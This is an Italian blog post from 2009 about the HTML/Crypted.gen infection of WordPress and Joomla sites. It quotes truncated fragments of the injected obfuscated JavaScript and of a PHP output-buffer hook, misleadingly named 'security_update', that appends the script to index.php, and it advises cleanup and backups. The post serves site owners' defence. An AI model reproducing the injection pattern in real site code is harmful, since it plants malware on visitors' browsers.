Creative Commons BY-NC-ND 2.5Questo sito e tutto il suo contenuto sono distribuiti sotto la licenza Creative Commons Attribuzione - Non Commerciale - Non opere derivate 2.5 Italia e con le condizioni d'uso definite nel disclaimer: siete pregati di leggere entrambi questi documenti prima di usufruire dei contenuti di questo sito. Per alcuni contenuti è necessaria una registrazione gratuita: non è necessario pagare e non è necessario accumulare punteggi per accedere agli articoli e scaricare i sorgenti. Basta solo essere onesti. Se volete che questo sito continui a rimanere attivo, a contribuire ogni giorno alla diffusione della cultura libera, non copiate il materiale per ripubblicarlo in altri luoghi : chi fa questo è solo un miserabile e un perdente. Se volete partecipare su settorezero e rendere le vostre idee, i vostri progetti, fruibili da tutti senza limitazioni, come dovrebbe essere in un paese civile e acculturato, potete farlo tranquillamente.

HTML/Crypted.gen attacca Wordpress e Joomla

Autore: Giovanni Bernardo | Data pubblicazione: 8 novembre 2009
Categorie: Sicurezza Web Develop

virus_html_crypted_genSta accadendo sempre più spesso ultimamente, che molti siti basati su Wordpress e Joomla, vengono attaccati in qualche modo dal Trojan segnalato da Avira come “HTML/Crypted.gen“. Non sono riuscito a capire se si tratta di un problema relativo a bug esistenti in questi due sistemi di publishing (ma ne dubito) o piuttosto da un virus che ha attaccato i server che ospitano tali siti.

Quest’ultima ipotesi mi è stata avvalorata dal fatto che tutte le persone che ho contattato e che hanno avuto lo stesso problema, hanno tutti l’hosting presso lo stesso provider. Non muovo ancora accuse per ora perchè la cosa è alquanto anomala e in rete non ho trovato informazioni soddisfacenti per poter fare un’ipotesi valida, per cui le mie sono soltanto supposizioni e vanno prese come tali.

Nel frattempo spero che questo post possa essere d’aiuto e oggetto di discussione per capire da dove si origina il problema.

C’è innanzitutto da dire che il virus altera le pagine (ma non sempre tutte le pagine del sito) con estensioni html, php, asp e js, aggiungendovi un codice javascript criptato, che più o meno inizia in questo modo:

<script language="javascript">$a=\"Z64dZ3dZ22q|se|qdu]qwys^e}rub8tqiZ3c0}

Dico “più o meno” perchè non a tutti si presenta allo stesso modo, è facile comunque identificare il codice maligno perchè, come si vede, è in qualche modo offuscato: non si leggono parole chiave ma soltanto sequenze di caratteri apparentemente assurde.

Relativamente a wordpress, invece, il codice malevolo viene generalmente inserito in tutte le pagine “index.php” e inizia in questo modo:

1
<?php ob_start("security_update"); function security_update($buffer){return $buffer."<script language=\"javascript\">$a=\"Z64dZ3dZ22q|se|qdu]qwys^e}

Pare che lo script non crei danni e venga rilevato solo da Avira (chiedo conferme). Il problema si risolve eliminando lo script ritenuto dannoso dalle pagine, oppure ricaricando una copia sana delle pagine sul server.

Alcuni utenti, invece, dopo aver preso un virus, si ritrovano la copia del sito (o altre pagine web) salvate sul  proprio pc con tale problema: quindi l’attacco pare che sia “locale” e non remoto: le pagine sembrano essere attaccate sullo stesso pc in cui risiedono. Questo mi fa pensare sempre più che sia un problema di hosting: difatti in tantissimi hanno sul proprio pc una copia del sito non infetta, mentre sul server è invece presente questo script nelle pagine.

La soluzione per potersi tenere al riparo è avere sempre un backup aggiornato del proprio sito sul PC e ordinare il backup del sito web qualora non ne fossimo provvisti.

Riporto qui alcuni link utili (per lo più riguardanti wordpress) relativi al problema esposto:

http://codex.wordpress.org/FAQ_My_site_was_hacked

http://www.wordpress-it.it/forum/topic/12452

Wordpress 2.8.5 ; Oltre 100 attacchi Hacker su Aruba

Articoli che potrebbero interessarti

L'articolo ti è piaciuto o ti è stato utile per risolvere un problema? Supporta e mantieni in vita questo sito, ci basta soltanto un caffè o una birra.
Se desiderate che settorezero continui a rimanere gratuito e fruibile da tutti, non copiate il nostro materiale e segnalateci se qualcuno lo fa

Non è possibile lasciare commenti,ma puoi lasciare un trackback dal tuo sito.

  1. #1 da Jacopo il 25 gennaio 2010

    Confermo anche io, si tratta di un virsul che prende qualsiasi sito (non solo wp o joomla) e tutti i siti che ho riscontrato avere il virus erano sullo stesso server provider (il primo in Italia).

  1. Ancora nessun trackback

I commenti sono chiusi.

settorezero.com e il logo Zroid™ ©2007÷2012 Giovanni Bernardo - E' vietata la copia e la distribuzione anche parziale dei contenuti di questo sito web senza l'esplicito consenso dell'autore.
I contenuti di settorezero.com sono distribuiti sotto una licenza Creative Commons Attribuzione-Non Commerciale-Non Opere derivate 2.5 Italia a cui vanno aggiunte le condizioni d'uso definite nel disclaimer.
settorezero.com e tutti i suoi contenuti sono tutelati dalla legge sul diritto d'autore per cui i trasgressori sono perseguibili a norma di legge.
Creative Commons BY-NC-ND 2.5
Il tema di questo sito è basato sul tema Fusion per wordpress, realizzato originariamente da digitalnature e fa uso del plugin Wassup per il computo delle statistiche. Per contattare l'autore siete pregati di utilizzare la sezione contatti.
Per essere aggiornato con tutte le novità di settorezero.com seguici anche anche su Facebook Twitter Tumblr Blogspot Youtube.